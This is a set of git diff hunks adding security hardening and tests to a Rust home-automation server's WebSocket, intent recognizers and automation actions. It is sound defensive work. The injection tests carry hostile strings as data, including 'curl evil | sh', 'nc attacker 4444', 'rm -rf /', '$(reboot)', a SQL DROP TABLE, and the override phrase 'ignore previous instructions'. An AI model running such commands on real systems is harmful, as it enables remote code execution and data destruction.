||||
assert_eq!(
|
||||
resp.status(),
|
||||
StatusCode::UNAUTHORIZED,
|
||||
"GET /api/ with a WRONG bearer must be 401 (HC-API-AUTH-01)"
|
||||
);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn api_root_accepts_correct_bearer() {
|
||||
let app = router(provisioned_state("the_real_token").await);
|
||||
let resp = app
|
||||
.oneshot(
|
||||
Request::builder()
|
||||
.uri("/api/")
|
||||
.header("Authorization", "Bearer the_real_token")
|
||||
.body(Body::empty())
|
||||
.unwrap(),
|
||||
)
|
||||
.await
|
||||
.unwrap();
|
||||
assert_eq!(
|
||||
resp.status(),
|
||||
StatusCode::OK,
|
||||
"GET /api/ with the correct bearer must still return 200 (API running.)"
|
||||
);
|
||||
}
|
||||
|
||||
@@ -166,3 +166,100 @@ async fn ping_pong_reply_is_received() {
|
||||
assert_eq!(reply["type"], "pong");
|
||||
assert_eq!(reply["id"], 7);
|
||||
}
|
||||
|
||||
/// Variant of [`spawn_server_with_token`] that also returns a `HomeCore`
|
||||
/// handle (cheap `Arc` clone) so the test can fire events into the *same*
|
||||
/// bus the served subscription reads from.
|
||||
async fn spawn_server_returning_homecore(valid_token: &str) -> (SocketAddr, HomeCore) {
|
||||
let hc = HomeCore::new();
|
||||
let tokens = LongLivedTokenStore::empty();
|
||||
tokens.register(valid_token).await;
|
||||
let state = SharedState::with_tokens(hc.clone(), "Test", "test-version", tokens);
|
||||
let app = router(state);
|
||||
|
||||
let listener = tokio::net::TcpListener::bind("127.0.0.1:0").await.unwrap();
|
||||
let addr = listener.local_addr().unwrap();
|
||||
tokio::spawn(async move {
|
||||
axum::serve(listener, app).await.unwrap();
|
||||
});
|
||||
(addr, hc)
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn subscription_survives_broadcast_lag() {
|
||||
// HC-WS-LAG-01: the per-subscription event task must treat a broadcast
|
||||
// `Lagged(n)` as RECOVERABLE (re-sync + continue), matching the bus
|
||||
// contract ("Lagged receivers must re-sync") and HA's WS semantics.
|
||||
//
|
||||
// The pre-fix `Err(_) => break` killed the whole event-stream task on
|
||||
// the first lag, so after a >4,096-event burst the client's stream
|
||||
// went permanently silent. This test fires far more than the 4,096
|
||||
// channel capacity to force a `Lagged`, then fires ONE more event and
|
||||
// asserts the subscription still delivers it. FAILS (5s timeout) on
|
||||
// the old code because the task is already dead.
|
||||
use homecore::{Context, DomainEvent};
|
||||
|
||||
let (addr, hc) = spawn_server_returning_homecore("good_token_abc").await;
|
||||
let url = format!("ws://{addr}/api/websocket");
|
||||
let (mut ws, _resp) = connect_async(&url).await.unwrap();
|
||||
|
||||
let _ = next_json(&mut ws).await; // auth_required
|
||||
ws.send(Message::Text(
|
||||
serde_json::json!({"type":"auth","access_token":"good_token_abc"}).to_string(),
|
||||
))
|
||||
.await
|
||||
.unwrap();
|
||||
let auth = next_json(&mut ws).await;
|
||||
assert_eq!(auth["type"], "auth_ok");
|
||||
|
||||
// Subscribe to a specific domain event type so unrelated traffic is
|
||||
// filtered out and we can deterministically match the post-lag event.
|
||||
ws.send(Message::Text(
|
||||
serde_json::json!({"id": 1, "type": "subscribe_events", "event_type": "lag_probe"})
|
||||
.to_string(),
|
||||
))
|
||||
.await
|
||||
.unwrap();
|
||||
let ack = next_json(&mut ws).await; // result ok for the subscribe
|
||||
assert_eq!(ack["type"], "result");
|
||||
assert_eq!(ack["success"], true);
|
||||
|
||||
// Flood the bus far past EVENT_CHANNEL_CAPACITY (4,096) with events the
|
||||
// subscription FILTERS OUT (different event_type). Because the client
|
||||
// never reads them off the WS, the server-side broadcast receiver falls
|
||||
// behind and the NEXT `recv()` yields `Lagged`. We fire synchronously
|
||||
// and don't yield to the WS reader, guaranteeing the overflow.
|
||||
for i in 0..6000u32 {
|
||||
hc.bus().fire_domain(DomainEvent::new(
|
||||
"noise",
|
||||
serde_json::json!({ "i": i }),
|
||||
Context::new(),
|
||||
));
|
||||
}
|
||||
|
||||
// Now fire the event the client IS subscribed to. On the fixed code the
|
||||
// task recovered from `Lagged` and continues, so this is delivered. On
|
||||
// the old code the task broke on `Lagged` and this never arrives.
|
||||
hc.bus().fire_domain(DomainEvent::new(
|
||||
"lag_probe",
|
||||
serde_json::json!({ "marker": "post-lag" }),
|
||||
Context::new(),
|
||||
));
|
||||
|
||||
// Drain frames until we see our post-lag event (ignoring any noise the
|
||||
// filter let slip before the lag), bounded by a timeout.
|
||||
let got = tokio::time::timeout(std::time::Duration::from_secs(5), async {
|
||||
loop {
|
||||
let v = next_json(&mut ws).await;
|
||||
if v["type"] == "event" && v["event"]["event_type"] == "lag_probe" {
|
||||
return v;
|
||||
}
|
||||
}
|
||||
})
|
||||
.await
|
||||
.expect(
|
||||
"subscription went silent after a broadcast lag — Lagged was treated \
|
||||
as fatal (HC-WS-LAG-01)",
|
||||
);
|
||||
assert_eq!(got["event"]["data"]["marker"], "post-lag");
|
||||
}
|
||||
|
||||
@@ -149,6 +149,44 @@ mod tests {
|
||||
assert!(sim_unrel < 0.3, "unrelated similarity too high: {sim_unrel:.3}");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn embeddings_are_structurally_finite() {
|
||||
// SECURITY (NaN-poisoning): the embedding path takes only `&str` and
|
||||
// produces values via FNV feature-hashing + a guarded L2 normalise.
|
||||
// There is NO external float input and NO unguarded division, so a
|
||||
// crafted utterance cannot inject NaN/±Inf into a vector and poison the
|
||||
// cosine k-NN match. Prove every component is finite across adversarial
|
||||
// inputs (empty, punctuation-only, unicode, very long, control chars).
|
||||
for s in [
|
||||
"",
|
||||
"!!! ???",
|
||||
"turn on the kitchen light",
|
||||
"🔥🔥🔥 \u{0}\u{1}\u{7f} mix",
|
||||
&"x".repeat(10_000),
|
||||
"NaN inf -inf 1e999",
|
||||
] {
|
||||
let v = embed(s);
|
||||
assert_eq!(v.len(), EMBEDDING_DIM);
|
||||
assert!(
|
||||
v.iter().all(|x| x.is_finite()),
|
||||
"embedding of {s:?} contained a non-finite component"
|
||||
);
|
||||
}
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn cosine_with_zero_vector_is_finite_not_nan() {
|
||||
// SECURITY (NaN-poisoning): an empty/punctuation-only utterance embeds
|
||||
// to the zero vector. Cosine against any exemplar must be a finite 0.0,
|
||||
// never NaN — so a below-threshold comparison stays well-defined and the
|
||||
// recognizer falls through (no action) rather than matching on garbage.
|
||||
let zero = embed("!!! ???");
|
||||
let real = embed("turn on the light");
|
||||
let sim = cosine_similarity(&zero, &real);
|
||||
assert!(sim.is_finite(), "cosine vs zero vector must be finite, got {sim}");
|
||||
assert_eq!(sim, 0.0, "dot product with the zero vector is exactly 0");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn identical_text_is_similarity_one() {
|
||||
let a = embed("lock the front door");
|
||||
|
||||
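The zero-vector property asserted in `cosine_with_zero_vector_is_finite_not_nan` can be sketched as follows. This is a minimal illustration, not the crate's `cosine_similarity`: `guarded_cosine` and `naive_cosine` are hypothetical names, and the guard shown (return `0.0` when either norm is zero) is one assumed way to obtain the behaviour the test pins.

```rust
/// Unguarded cosine: divides by the product of norms, so a zero vector
/// yields 0.0 / 0.0 = NaN.
fn naive_cosine(a: &[f32], b: &[f32]) -> f32 {
    let dot: f32 = a.iter().zip(b).map(|(x, y)| x * y).sum();
    let na: f32 = a.iter().map(|x| x * x).sum::<f32>().sqrt();
    let nb: f32 = b.iter().map(|x| x * x).sum::<f32>().sqrt();
    dot / (na * nb)
}

/// Guarded cosine (hypothetical): returns 0.0 when either norm is zero, so a
/// threshold comparison against the result is always well-defined.
fn guarded_cosine(a: &[f32], b: &[f32]) -> f32 {
    let dot: f32 = a.iter().zip(b).map(|(x, y)| x * y).sum();
    let na: f32 = a.iter().map(|x| x * x).sum::<f32>().sqrt();
    let nb: f32 = b.iter().map(|x| x * x).sum::<f32>().sqrt();
    if na == 0.0 || nb == 0.0 {
        return 0.0;
    }
    dot / (na * nb)
}

fn main() {
    let zero = [0.0f32, 0.0, 0.0];
    let real = [0.6f32, 0.8, 0.0];
    println!("naive   = {}", naive_cosine(&zero, &real));
    println!("guarded = {}", guarded_cosine(&zero, &real));
}
```

The guard matters because every comparison involving NaN is false: an unguarded result can only fall through safely by accident of how the threshold check is written, whereas a finite `0.0` falls through by construction.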
@@ -47,7 +47,9 @@ pub mod pipeline;
 pub mod embedding;

 pub use intent::{Card, Intent, IntentName, IntentResponse};
-pub use recognizer::{IntentRecognizer, RecognizerError, RegexIntentRecognizer};
+pub use recognizer::{
+    IntentRecognizer, RecognizerError, RegexIntentRecognizer, MAX_UTTERANCE_BYTES,
+};
 pub use semantic_recognizer::{SemanticIntentRecognizer, DEFAULT_SIMILARITY_THRESHOLD};
 pub use handler::{
     HandlerError, HassCancelAll, HassLightSet, HassNevermind, HassTurnOff, HassTurnOn,
|
||||
@@ -215,6 +215,52 @@ mod tests {
|
||||
assert!(resp.speech.contains("not sure") || resp.speech.contains("I'm not"));
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn pipeline_injection_shaped_utterance_carries_no_metachars_to_service() {
|
||||
// SECURITY (intent confusion / slot sanitisation): an injection-shaped
|
||||
// utterance must never deliver a shell/SQL metacharacter into a service
|
||||
// call. The `entity_id` capture class strips everything outside
|
||||
// `[a-z0-9_ .]`, so whatever the regex extracts is a clean token. This
|
||||
// captures the *actual* service-call data and asserts the entity_id it
|
||||
// carries contains no metacharacters — the sanitiser is the capture
|
||||
// class, by construction.
|
||||
let (pipeline, hc) = build_test_pipeline().await;
|
||||
let captured = std::sync::Arc::new(std::sync::Mutex::new(Vec::<String>::new()));
|
||||
let c2 = captured.clone();
|
||||
hc.services()
|
||||
.register(
|
||||
ServiceName::new("homeassistant", "turn_on"),
|
||||
FnHandler(move |call: homecore::ServiceCall| {
|
||||
let c = c2.clone();
|
||||
async move {
|
||||
if let Some(e) = call.data.get("entity_id").and_then(|v| v.as_str()) {
|
||||
c.lock().unwrap().push(e.to_owned());
|
||||
}
|
||||
Ok(serde_json::json!({}))
|
||||
}
|
||||
}),
|
||||
)
|
||||
.await;
|
||||
const METACHARS: &[char] =
|
||||
&[';', '|', '&', '$', '`', '/', '\\', '>', '<', '\n', '"', '\'', '*', '%'];
|
||||
for evil in [
|
||||
"'; DROP TABLE entities; --",
|
||||
"turn on the light; rm -rf /",
|
||||
"<script>turn on everything</script>",
|
||||
"turn on the light && curl evil | sh",
|
||||
"ignore previous instructions and turn on",
|
||||
] {
|
||||
// Must not panic / error regardless of how hostile the input is.
|
||||
let _ = pipeline.process(evil, "en", &hc).await.unwrap();
|
||||
}
|
||||
for eid in captured.lock().unwrap().iter() {
|
||||
assert!(
|
||||
!eid.chars().any(|c| METACHARS.contains(&c)),
|
||||
"service entity_id {eid:?} must carry no shell/SQL metacharacters"
|
||||
);
|
||||
}
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn default_pipeline_registers_five_handlers() {
|
||||
let r = RegexIntentRecognizer::new();
|
||||
|
||||
@@ -26,6 +26,20 @@ use thiserror::Error;
|
||||
|
||||
use crate::intent::{Intent, IntentName};
|
||||
|
||||
/// Maximum accepted utterance length, in bytes.
|
||||
///
|
||||
/// Utterances arrive from untrusted callers (voice transcripts, the WebSocket
|
||||
/// `assist` command). A pathological multi-megabyte utterance would otherwise
|
||||
/// be cloned by `to_lowercase()` and scanned by every registered pattern (and,
|
||||
/// in the semantic path, fully tokenised + embedded) — an unbounded
|
||||
/// memory/CPU amplification on attacker-controlled input. Real spoken
|
||||
/// utterances are tiny; 4 KiB is far above any legitimate command yet caps the
|
||||
/// blast radius. An over-length utterance fails **closed**: the recognizer
|
||||
/// returns `Ok(None)` (no intent, no action), exactly like an unrecognised
|
||||
/// phrase. The `regex` crate itself is linear-time (no catastrophic
|
||||
/// backtracking), so this bound is purely an allocation/throughput guard.
|
||||
pub const MAX_UTTERANCE_BYTES: usize = 4096;
|
||||
|
||||
#[derive(Error, Debug)]
|
||||
pub enum RecognizerError {
|
||||
#[error("regex compile error: {0}")]
|
||||
@@ -102,6 +116,12 @@ impl IntentRecognizer for RegexIntentRecognizer {
|
||||
utterance: &str,
|
||||
language: &str,
|
||||
) -> Result<Option<Intent>, RecognizerError> {
|
||||
// Fail-closed on an over-length utterance before any allocation/scan.
|
||||
// Untrusted input must not be able to force an unbounded `to_lowercase`
|
||||
// clone + per-pattern scan. Bound first, then normalise.
|
||||
if utterance.len() > MAX_UTTERANCE_BYTES {
|
||||
return Ok(None);
|
||||
}
|
||||
let normalised = utterance.trim().to_lowercase();
|
||||
let patterns = self.patterns.read().await;
|
||||
for pattern in patterns.iter() {
|
||||
@@ -183,6 +203,55 @@ mod tests {
|
||||
assert!(result.is_none());
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn over_length_utterance_fails_closed() {
|
||||
// SECURITY (DoS / fail-closed): an utterance larger than the bound must
|
||||
// return Ok(None) WITHOUT being normalised or scanned. Crucially, even
|
||||
// an over-length utterance that *contains* a matching command must NOT
|
||||
// resolve — fail closed, never open.
|
||||
//
|
||||
// This FAILS against the pre-fix recognizer: there, a giant prefix
|
||||
// followed by "turn on the kitchen light" would still match HassTurnOn
|
||||
// (and force a multi-megabyte `to_lowercase` clone + scan first).
|
||||
let r = turn_on_recognizer().await;
|
||||
let huge = format!("{} turn on the kitchen light", "a ".repeat(MAX_UTTERANCE_BYTES));
|
||||
assert!(huge.len() > MAX_UTTERANCE_BYTES);
|
||||
|
||||
let result = r.recognize(&huge, "en").await.unwrap();
|
||||
assert!(
|
||||
result.is_none(),
|
||||
"over-length utterance must fail closed (no intent, no action)"
|
||||
);
|
||||
|
||||
// And a just-under-bound utterance still works, so the cap doesn't
|
||||
// break legitimate (tiny) commands.
|
||||
let ok = r
|
||||
.recognize("turn on the kitchen light", "en")
|
||||
.await
|
||||
.unwrap();
|
||||
assert!(ok.is_some(), "normal-length command must still resolve");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn pathological_backtracking_pattern_completes_in_bounded_time() {
|
||||
// SECURITY (ReDoS): the `regex` crate is a linear-time finite automaton,
|
||||
// so even a classic catastrophic-backtracking shape `(a+)+$` cannot hang
|
||||
// on a crafted adversarial input. This proves the recognizer terminates
|
||||
// promptly on the worst-case input the regex engine is asked to run.
|
||||
let r = RegexIntentRecognizer::new();
|
||||
r.register("Evil", r"(a+)+$", "*").await.unwrap();
|
||||
// Just under the length bound: all 'a' then a 'b' — the classic input
|
||||
// that destroys a backtracking engine. Linear-time regex shrugs.
|
||||
let evil = format!("{}b", "a".repeat(MAX_UTTERANCE_BYTES - 1));
|
||||
let start = std::time::Instant::now();
|
||||
let _ = r.recognize(&evil, "en").await.unwrap();
|
||||
let elapsed = start.elapsed();
|
||||
assert!(
|
||||
elapsed < std::time::Duration::from_secs(2),
|
||||
"linear-time regex must not hang on adversarial input; took {elapsed:?}"
|
||||
);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn language_filter_skips_non_matching() {
|
||||
let r = RegexIntentRecognizer::new();
|
||||
|
||||
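The "bound first, then normalise" ordering from the recognizer hunks can be sketched in isolation. This is a simplified illustration under stated assumptions: `normalise_bounded` is a hypothetical helper, not a function in the crate, and it returns `Option<String>` rather than the recognizer's `Result<Option<Intent>, RecognizerError>`. It also shows a detail that is easy to miss: `str::len()` counts bytes, so the cap is on encoded size, not on character count.

```rust
/// Same value as the constant introduced in the diff.
const MAX_UTTERANCE_BYTES: usize = 4096;

/// Hypothetical helper: rejects an over-length utterance before any
/// allocation, otherwise returns the trimmed, lowercased text.
fn normalise_bounded(utterance: &str) -> Option<String> {
    // `len()` is the UTF-8 byte length and is O(1), so the check itself
    // costs nothing regardless of input size.
    if utterance.len() > MAX_UTTERANCE_BYTES {
        return None; // fail closed: no intent, no action
    }
    Some(utterance.trim().to_lowercase())
}

fn main() {
    let ok = normalise_bounded("  Turn ON the Kitchen Light ");
    println!("{ok:?}");

    // 3000 two-byte characters: 3000 chars, but 6000 bytes, so rejected.
    let multibyte = "é".repeat(3000);
    println!("bytes={} accepted={}", multibyte.len(), normalise_bounded(&multibyte).is_some());
}
```

Because the comparison is a strict `>`, an utterance of exactly `MAX_UTTERANCE_BYTES` bytes is still accepted, which matches the adversarial test above that builds an input of exactly that length.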
@@ -393,6 +393,63 @@ mod tests {
|
||||
assert!(matches!(err, AssistError::ParseError(_)));
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn shell_metachars_never_survive_into_a_resolved_slot() {
|
||||
// SECURITY (command/argument injection): two layers of defense.
|
||||
// 1. There is NO subprocess — `spawn` is a lifecycle flag and
|
||||
// `RufloRunnerOpts` is inert, so no argv is ever built.
|
||||
// 2. Even so, the `entity_id` capture class is `[a-z_][a-z0-9_ .]*`,
|
||||
// which *excludes* every shell metacharacter. So when an
|
||||
// injection-shaped utterance DOES resolve (the regex is not exact-
|
||||
// anchored), the captured slot is a clean token with the hostile
|
||||
// tail stripped — never `;`, `|`, `$`, backtick, `&`, `/`, etc.
|
||||
// This pins the slot-sanitisation-by-construction property: a slot value
|
||||
// can never carry a metachar into a (future) argv.
|
||||
let mut runner = LocalRunner::new(turn_on_recognizer().await);
|
||||
runner.spawn(RufloRunnerOpts::default()).await.unwrap();
|
||||
const METACHARS: &[char] = &[';', '|', '&', '$', '`', '/', '\\', '>', '<', '\n', '"', '\''];
|
||||
for evil in [
|
||||
"turn on the light; rm -rf /",
|
||||
"turn on the light && shutdown -h now",
|
||||
"turn on the light | nc attacker 4444",
|
||||
"turn on the light `curl evil.sh | sh`",
|
||||
"turn on the light $(reboot)",
|
||||
] {
|
||||
let resp = runner
|
||||
.send_request(serde_json::json!({"utterance": evil, "language": "en"}))
|
||||
.await
|
||||
.unwrap();
|
||||
if let Some(intent) = resp.intent {
|
||||
if let Some(eid) = intent.entity_id() {
|
||||
assert!(
|
||||
!eid.chars().any(|c| METACHARS.contains(&c)),
|
||||
"resolved entity_id {eid:?} from {evil:?} must contain no shell metachars"
|
||||
);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn runner_opts_are_inert_no_process_spawned() {
|
||||
// SECURITY (command injection): even a hostile `script_path` / `env` in
|
||||
// RufloRunnerOpts is never consumed — `spawn` launches no process. This
|
||||
// documents-and-pins that the data-gated P2 subprocess is genuinely
|
||||
// absent (confirmed Noop/Local, no spawn surface today).
|
||||
let mut env = std::collections::HashMap::new();
|
||||
env.insert("EVIL".to_owned(), "$(rm -rf /)".to_owned());
|
||||
let opts = RufloRunnerOpts {
|
||||
script_path: "/bin/sh -c 'curl evil | sh'".to_owned(),
|
||||
env,
|
||||
timeout_ms: 1,
|
||||
};
|
||||
let mut runner = NoopRunner::new();
|
||||
// No panic, no spawn, no error — the opts are pure data.
|
||||
assert!(runner.spawn(opts.clone()).await.is_ok());
|
||||
let mut local = LocalRunner::new(turn_on_recognizer().await);
|
||||
assert!(local.spawn(opts).await.is_ok());
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn local_runner_send_before_spawn_is_not_started() {
|
||||
let runner = LocalRunner::new(turn_on_recognizer().await);
|
||||
|
||||
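The "sanitiser is the capture class" argument in the injection tests above can be made concrete with a small std-only sketch. It assumes the class quoted in the test comment, `[a-z_][a-z0-9_ .]*`, and hand-rolls a greedy prefix match instead of using the `regex` crate; `capture_entity` is a hypothetical function, and the real recognizer's patterns and anchoring may differ.

```rust
/// Returns the longest prefix of `s` that matches `[a-z_][a-z0-9_ .]*`,
/// or `None` if the first character is outside `[a-z_]`.
fn capture_entity(s: &str) -> Option<&str> {
    let mut end = 0;
    for (i, c) in s.char_indices() {
        let allowed = if i == 0 {
            c.is_ascii_lowercase() || c == '_'
        } else {
            c.is_ascii_lowercase() || c.is_ascii_digit() || matches!(c, '_' | ' ' | '.')
        };
        if !allowed {
            break; // the hostile tail is never part of the capture
        }
        end = i + c.len_utf8();
    }
    if end == 0 {
        None
    } else {
        Some(&s[..end])
    }
}

fn main() {
    for tail in ["the light; rm -rf /", "the light | nc attacker 4444", "; DROP TABLE"] {
        println!("{tail:?} -> {:?}", capture_entity(tail));
    }
}
```

Whatever follows the first disallowed character is dropped, so the captured slot cannot contain `;`, `|`, `$`, a backtick, or any other character outside the class, independent of how the utterance was crafted.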
@@ -135,6 +135,12 @@ impl SemanticIntentRecognizer {
|
||||
utterance: &str,
|
||||
language: &str,
|
||||
) -> Result<(Option<Intent>, Option<f32>), RecognizerError> {
|
||||
// Fail-closed on an over-length utterance before embedding/scanning.
|
||||
// Untrusted input must not force an unbounded `to_lowercase` clone +
|
||||
// full tokenisation/embedding. Mirrors the regex recognizer's bound.
|
||||
if utterance.len() > crate::recognizer::MAX_UTTERANCE_BYTES {
|
||||
return Ok((None, None));
|
||||
}
|
||||
if let Some((id, similarity)) = self.nearest(utterance, language).await {
|
||||
if similarity >= self.threshold {
|
||||
let inner = self.index.read().await;
|
||||
@@ -228,6 +234,32 @@ mod tests {
|
||||
r
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn empty_utterance_against_empty_index_no_panic_no_match() {
|
||||
// SECURITY (NaN/empty-poisoning): an empty (zero-vector) query against an
|
||||
// empty index must not panic and must yield no intent — the recognizer
|
||||
// falls through to the (also empty) regex fallback. Proves the empty-
|
||||
// iterator `max_by` path returns None cleanly.
|
||||
let semantic = SemanticIntentRecognizer::new(RegexIntentRecognizer::new());
|
||||
let result = semantic.recognize("", "en").await.unwrap();
|
||||
assert!(result.is_none(), "empty utterance must produce no intent / no action");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn over_length_utterance_fails_closed_semantic() {
|
||||
// SECURITY (DoS / fail-closed): an over-length utterance must short-
|
||||
// circuit before embedding/scanning, returning no intent — even if it
|
||||
// textually contains an enrolled/fallback-matchable command.
|
||||
let semantic = SemanticIntentRecognizer::new(turn_on_recognizer().await);
|
||||
let huge = format!(
|
||||
"{} turn on the kitchen light",
|
||||
"a ".repeat(crate::recognizer::MAX_UTTERANCE_BYTES)
|
||||
);
|
||||
assert!(huge.len() > crate::recognizer::MAX_UTTERANCE_BYTES);
|
||||
let result = semantic.recognize(&huge, "en").await.unwrap();
|
||||
assert!(result.is_none(), "over-length utterance must fail closed in semantic path");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn semantic_recognizer_delegates_to_fallback() {
|
||||
// No exemplars enrolled → empty HNSW index → pure regex fallback.
|
||||
|
||||
@@ -29,8 +29,10 @@ serde = { version = "1", features = ["derive"] }
 serde_yaml = "0.9"
 serde_json = "1"

-# MiniJinja — HA-compatible Jinja2 template engine in pure Rust (ADR-129 §2.1)
-minijinja = { version = "2", features = ["json", "loader"] }
+# MiniJinja — HA-compatible Jinja2 template engine in pure Rust (ADR-129 §2.1).
+# `fuel` bounds instruction count so a malicious `template:` condition cannot
+# spin the engine with a nested-loop / huge-repeat DoS (HC-SEC-01).
+minijinja = { version = "2", features = ["json", "loader", "fuel"] }

 # Error handling
 thiserror = "1"
|
||||
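The idea behind an instruction budget, as enabled by the `fuel` feature in the manifest hunk above, can be sketched without MiniJinja. The code below is a conceptual model only: `Fuel` and `render_nested` are hypothetical, they do not reproduce MiniJinja's internals or its exact accounting, and the one-unit-per-iteration charge is an assumption made to keep the arithmetic easy to follow.

```rust
/// Hypothetical budget counter: each unit of work must be paid for up front.
struct Fuel {
    remaining: u64,
}

impl Fuel {
    fn consume(&mut self, units: u64) -> Result<(), String> {
        match self.remaining.checked_sub(units) {
            Some(left) => {
                self.remaining = left;
                Ok(())
            }
            None => Err("out of fuel".to_string()),
        }
    }
}

/// Models a doubly nested loop that emits one character per inner iteration,
/// charging one unit of fuel each time. Returns the output length on success.
fn render_nested(outer: u64, inner: u64, budget: u64) -> Result<usize, String> {
    let mut fuel = Fuel { remaining: budget };
    let mut out_len = 0usize;
    for _ in 0..outer {
        for _ in 0..inner {
            fuel.consume(1)?; // stops the render as soon as the budget is spent
            out_len += 1;
        }
    }
    Ok(out_len)
}

fn main() {
    println!("{:?}", render_nested(10, 10, 1_000_000));
    println!("{:?}", render_nested(10_000, 10_000, 1_000_000));
}
```

The total work is capped by the budget rather than by the product of the loop bounds: the 10,000 by 10,000 case stops after one million charged iterations instead of running all one hundred million.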
@@ -70,6 +70,32 @@ impl ExecutionContext {
|
||||
}
|
||||
}
|
||||
|
||||
/// Upper bound for a `delay` / `wait_for_trigger` timeout, in seconds
|
||||
/// (~100 years). Caps absurd values so `Duration::from_secs_f64` cannot
|
||||
/// overflow-panic on e.g. `seconds: 1e308`, while still allowing any
|
||||
/// realistic automation delay (HC-SEC-02).
|
||||
const MAX_DELAY_SECS: f64 = 3.15e9;
|
||||
|
||||
/// Convert a user-supplied seconds value into a `Duration` without
|
||||
/// panicking (HC-SEC-02).
|
||||
///
|
||||
/// `Duration::from_secs_f64` **panics** on negative, NaN, infinite, or
|
||||
/// overflowing inputs. Those values are all reachable from a crafted
|
||||
/// automation YAML (`delay: {seconds: -1}`, `.nan`, `.inf`, `1e308`), so a
|
||||
/// single hostile config would crash the running automation task. We
|
||||
/// instead saturate to a safe range — matching Home Assistant's lenient
|
||||
/// treatment of a non-positive delay as "no delay":
|
||||
///
|
||||
/// - non-finite (NaN / ±inf) → `0`
|
||||
/// - negative → `0`
|
||||
/// - above [`MAX_DELAY_SECS`] → clamped to the cap
|
||||
fn safe_duration_from_secs(seconds: f64) -> Duration {
|
||||
if !seconds.is_finite() || seconds <= 0.0 {
|
||||
return Duration::ZERO;
|
||||
}
|
||||
Duration::from_secs_f64(seconds.min(MAX_DELAY_SECS))
|
||||
}
|
||||
|
||||
/// Action configuration. Deserialized from YAML `action:` blocks.
|
||||
#[derive(Clone, Debug, Serialize, Deserialize)]
|
||||
#[serde(tag = "action", rename_all = "snake_case")]
|
||||
@@ -154,7 +180,10 @@ impl Action {
                 Ok(result)
             }
             Action::Delay { seconds } => {
-                let dur = Duration::from_secs_f64(*seconds);
+                // `safe_duration_from_secs` guards against negative /
+                // NaN / infinite / overflowing values that would
+                // otherwise panic `Duration::from_secs_f64` (HC-SEC-02).
+                let dur = safe_duration_from_secs(*seconds);
                 sleep(dur).await;
                 Ok(serde_json::Value::Null)
             }
@@ -172,7 +201,8 @@ impl Action {
                 // P1 stub — just sleeps for the timeout duration if specified.
                 // Full trigger subscription lands in P2.
                 if let Some(secs) = timeout_seconds {
-                    sleep(Duration::from_secs_f64(*secs)).await;
+                    // Same non-panicking guard as `Delay` (HC-SEC-02).
+                    sleep(safe_duration_from_secs(*secs)).await;
                 }
                 Ok(serde_json::Value::Null)
             }
@@ -243,6 +273,68 @@ mod tests {
|
||||
assert!(result.is_null());
|
||||
}
|
||||
|
||||
// ── HC-SEC-02: a crafted delay must not panic the run task ─────────
|
||||
//
|
||||
// `Duration::from_secs_f64` panics on negative / NaN / infinite /
|
||||
// overflowing inputs, all reachable from a YAML `delay:` value. On the
|
||||
// pre-fix code each of these aborts the spawned automation task with a
|
||||
// panic; the guard saturates to a safe Duration instead. These tests
|
||||
// fail on the pre-fix code (a panic counts as a test failure).
|
||||
#[tokio::test]
|
||||
async fn delay_negative_seconds_does_not_panic() {
|
||||
let hc = HomeCore::new();
|
||||
let mut ctx = ExecutionContext::new(hc, "auto");
|
||||
let result = Action::Delay { seconds: -1.0 }.execute(&mut ctx).await;
|
||||
assert!(result.is_ok(), "negative delay must be treated as 0, not panic");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn delay_nan_seconds_does_not_panic() {
|
||||
let hc = HomeCore::new();
|
||||
let mut ctx = ExecutionContext::new(hc, "auto");
|
||||
let result = Action::Delay { seconds: f64::NAN }.execute(&mut ctx).await;
|
||||
assert!(result.is_ok(), "NaN delay must be treated as 0, not panic");
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn delay_infinite_seconds_does_not_panic() {
|
||||
let hc = HomeCore::new();
|
||||
let mut ctx = ExecutionContext::new(hc, "auto");
|
||||
let result = Action::Delay { seconds: f64::INFINITY }.execute(&mut ctx).await;
|
||||
assert!(result.is_ok(), "infinite delay must saturate to 0, not panic");
|
||||
}
|
||||
|
||||
// Note: the overflow case (1e300) is covered by the synchronous
|
||||
// `safe_duration_saturates_hostile_values` unit test below — executing
|
||||
// `Action::Delay { seconds: 1e300 }` would genuinely sleep for the
|
||||
// clamped (~100-year) duration, so we assert the conversion directly
|
||||
// rather than through `execute`.
|
||||
|
||||
#[tokio::test]
|
||||
async fn wait_for_trigger_negative_timeout_does_not_panic() {
|
||||
let hc = HomeCore::new();
|
||||
let mut ctx = ExecutionContext::new(hc, "auto");
|
||||
let result = Action::WaitForTrigger { timeout_seconds: Some(-5.0) }
|
||||
.execute(&mut ctx)
|
||||
.await;
|
||||
assert!(result.is_ok(), "negative wait timeout must not panic");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn safe_duration_saturates_hostile_values() {
|
||||
assert_eq!(safe_duration_from_secs(-1.0), Duration::ZERO);
|
||||
assert_eq!(safe_duration_from_secs(f64::NAN), Duration::ZERO);
|
||||
assert_eq!(safe_duration_from_secs(f64::INFINITY), Duration::ZERO);
|
||||
assert_eq!(safe_duration_from_secs(f64::NEG_INFINITY), Duration::ZERO);
|
||||
// legitimate value preserved
|
||||
assert_eq!(safe_duration_from_secs(2.5), Duration::from_secs_f64(2.5));
|
||||
// huge value clamped to the cap, not overflow-panicked
|
||||
assert_eq!(
|
||||
safe_duration_from_secs(1e300),
|
||||
Duration::from_secs_f64(MAX_DELAY_SECS)
|
||||
);
|
||||
}
|
||||
|
||||
#[tokio::test]
|
||||
async fn service_call_unregistered_returns_error() {
|
||||
let hc = HomeCore::new();
|
||||
|
||||
